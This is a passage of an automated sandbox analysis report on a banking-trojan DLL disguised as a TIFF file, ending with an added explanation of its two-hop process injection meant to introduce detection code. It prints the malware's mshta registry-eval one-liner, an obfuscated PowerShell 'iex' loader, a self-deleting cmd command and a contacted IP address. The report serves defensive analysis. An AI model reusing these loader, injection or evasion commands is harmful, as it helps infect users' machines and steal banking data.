                      Source: Yara match | File source: 00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.302666274.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.253266400.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.253321859.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.253151966.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.253434533.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.253537192.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.253077310.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.303583479.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.299890111.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4956, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 6784, type: MEMORYSTR
                      Source: Yara match | File source: 2.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.49494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.49494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4f0a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4f0a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4f894a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4fb6b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.369488668.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.417250518.0000000004949000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.243438048.000000000125B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

                      System Summary

                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 626a983c091a8.tiff.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05953DB0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0594154D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059367CA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0594D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0594FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593B238
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05948E57 CreateProcessAsUserW
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05946DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059374AE NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05940782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0594BE80 NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059461AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593710A GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05947950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059400DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0594A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05945312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05942331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059364C4 memset,NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059336BB NtGetContextThread,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059310C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05943829 NtQuerySystemInformation,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0594EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05945220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: 626a983c091a8.tiff.dll | Binary or memory string: OriginalFilenamemyfile.exe$ vs 626a983c091a8.tiff.dll
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 626a983c091a8.tiff.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 626a983c091a8.tiff.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll"
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP"
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220428
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpafcgl0.stl.ps1
                      Source: classification engine | Classification label: mal100.bank.troj.evad.winDLL@24/17@0/2
                      Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593EE04 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01
                      Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{D44018A4-23B6-2625-4D48-07BAD1FC2B8E}
                      Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{008CBBEE-5F0F-3295-E934-03862DA8E71A}
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: 626a983c091a8.tiff.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.366271329.0000000005F50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.361877271.0000000005F50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 626a983c091a8.tiff.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.366271329.0000000005F50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.361877271.0000000005F50000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05953D9F push ecx; ret 2_2_05953DAF
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05933495 push ecx; mov dword ptr [esp], 00000002h 2_2_05933496
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059538A0 push ecx; ret 2_2_059538A9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey
                      Source: 626a983c091a8.tiff.dll | Static PE information: real checksum: 0x79835 should be: 0xa2af3
                      Source: tn4ral5l.dll.24.dr | Static PE information: real checksum: 0x0 should be: 0x2793
                      Source: o1ulwvct.dll.22.dr | Static PE information: real checksum: 0x0 should be: 0x1f56
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: Yara matchFile source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll (listed twice)
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (7 identical entries)
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (73 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 (listed twice)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (listed twice)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5256
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4164
Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 7.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059365C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_059365C2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059399BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_059399BC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0594BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0594BAD1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0593FD47
Source: explorer.exe, 0000001C.00000000.389877522.00000000051AC000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001C.00000000.389296531.00000000051D2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
Source: explorer.exe, 0000001C.00000000.391000685.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000000.424200034.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000027.00000000.567670416.000001F9B9A59000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000000.417737706.000000000510C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000000.390729002.0000000005448000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&]$
Source: explorer.exe, 0000001C.00000000.391000685.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@@
Source: explorer.exe, 0000001C.00000000.389296531.00000000051D2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: mshta.exe, 00000012.00000002.325022783.0000018711881000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000012.00000002.325022783.0000018711881000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000000.417737706.000000000510C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001C.00000000.424200034.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00dRom0cY
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,2_2_0593EC00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05938FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_05938FEC

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 94.140.115.8 80
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6F6BD12E0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: E20000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6F6BD12E0
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 354000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 4B0000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\control.exe base: E20000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: 4B0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 354000 value: 00
Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: EB
Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 4B0000 value: 80
Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: 40
Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 6784
Source: C:\Windows\System32\control.exe | Thread register set: target process: 3616
Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 2BC1580
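The entries above record a two-hop injection: rundll32.exe (PID 4956) allocates an execute/read/write region in control.exe (PID 6784), writes into it and sets thread registers there; control.exe then allocates an RWX region in explorer.exe (PID 3616), flips the protection of the page at 7FF802BC1580 between RWX and RX, writes the byte EB (the x86/x64 short-JMP opcode) at that address, creates a thread in explorer.exe starting there, and later writes the byte 40 at the same address. A rule that looks at one process-access or remote-thread event at a time sees only one hop; the second hop starts from control.exe, a signed Windows binary. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample. It builds an injection graph from Sysmon-style ProcessAccess (event 10) and CreateRemoteThread (event 8) records and walks it so the whole chain surfaces. The event dicts are constructed to mirror this report: the Sysmon field names are real, the PIDs and the thread start address are taken from the report, and the 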